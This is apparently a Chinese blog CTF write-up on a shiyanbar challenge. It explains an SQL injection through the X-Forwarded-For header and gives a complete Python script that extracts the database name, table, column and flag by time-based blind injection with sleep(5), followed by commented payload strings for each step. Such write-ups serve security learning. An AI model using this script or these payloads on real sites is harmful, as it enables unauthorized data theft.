根据提示:
我要把攻击我的人都记录db中去!
记录了我们的iP,由此猜测应该是HTTP头注入,获取IP则是通过头中的X-FORWADED-FOR来获取的
相关知识:http://www.cnblogs.com/softidea/p/5325079.html
由此需要写代码来完成相关操作
#!/usr/bin/python #coding=utf-8 #Author = One import requests def request(sql): url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" payload = { "Host":"ctf5.shiyanbar.com", "X-FORWARDED-FOR":sql, "User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "ccept-Encoding":"gzip, deflate", "Cookie":"Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1497371533,1499754629; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*80971%2CnickName%3AOne; _ga=GA1.2.1839998664.1499754828; _gid=GA1.2.1200124816.1499754828; Hm_lpvt_34d6f7353ab0915a4c582e4516dffbc3=1499764932; PHPSESSID=10gs5psspg8sh6d0unein5uak0", "Connection":"keep-alive" } try: requests.get(url,headers=payload,timeout=4) return 0 except: return 1 def violent(strs): keys = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXY}Z{_" n = 0 key = "" for i in range(1,35): for j in keys: sql = "127.0.0.1‘ and case when substring(("+strs+") from "+str(i)+" for 1)=‘"+j+"‘ then sleep(5) else 0 end and ‘1‘=‘1" result = request(sql) if(result == 1): key += j break else: n += 1 if(n == 65): return key break else: n = 0 def main(): #猜解数据库名 dbn_sql = "select database()" db_name = violent(dbn_sql) print "数据库名:"+db_name #猜解数据库中表名 #tbn_sql1 = "select table_name from information_schema.tables where table_schema = ‘Web4‘ order by table_name asc limit 1" #print violent(tbn_sql1) tbn_sql2 = "select table_name from information_schema.tables where table_schema = ‘"+db_name+"‘ order by table_name desc limit 1" tb_name = violent(tbn_sql2) print "需要查看的表名:"+tb_name #猜解表中字段名 cln_sql = "select column_name from information_schema.columns where table_name = ‘"+tb_name+"‘" col_name = violent(cln_sql) print "表中的字段名:"+col_name #猜解记录 key_sql = "select "+col_name+" from "+tb_name print violent(key_sql) if __name__ == ‘__main__‘: main() #判断数据库长度127.0.0.1‘ and case when length(database())=4 then sleep(5) else 1 end and ‘1‘=‘1 #判断数据库名字127.0.0.1‘ and case when (ascii(substring((select database()) from 1 for 1))&1)=1 then sleep(5) else 1 end and ‘1‘=‘1 #判断数据表数量127.0.0.1‘ and case when (select count(table_name) from information_schema.tables where table_schema = ‘web4‘)=4 then sleep(5) else 1 end and ‘1‘=‘1 #判断数据库表名长度127.0.0.1‘ and case when (select length(table_name) from information_schema.tables where table_schema = ‘Web4‘ order by table_name asc limit 1) #判断数据库表名127.0.0.1‘ and case when (select table_name from information_schema.tables where table_schema = ‘Web4‘ order by table_name asc limit 1) #判断表中字段数量127.0.0.1‘ and case when (select count(column_name) from information_schema.columns where table_name = ‘flag‘) #判断表中字段名长度127.0.0.1‘ and case when (select length(column_name) from information_schema.columns where table_name = ‘flag‘) #判断表中字段名127.0.0.1‘ and case when (select column_name from information_schema.columns where table_name = ‘flag‘) #判断记录数量127.0.0.1‘ and case when (select count(flag) from flag) #判断记录长度127.0.0.1‘ and case when (select length(flag) from flag) 代码写的比较菜...也是看了别人写的一些write up参考的,跑出来的结果要放在ctf{}中,如果不对,多跑几遍 本人也是初学者,有什么错误的地方,希望大家指出,谢谢!
本文出自 “11846238” 博客,请务必保留此出处http://11856238.blog.51cto.com/11846238/1947315
原文地址:http://11856238.blog.51cto.com/11846238/1947315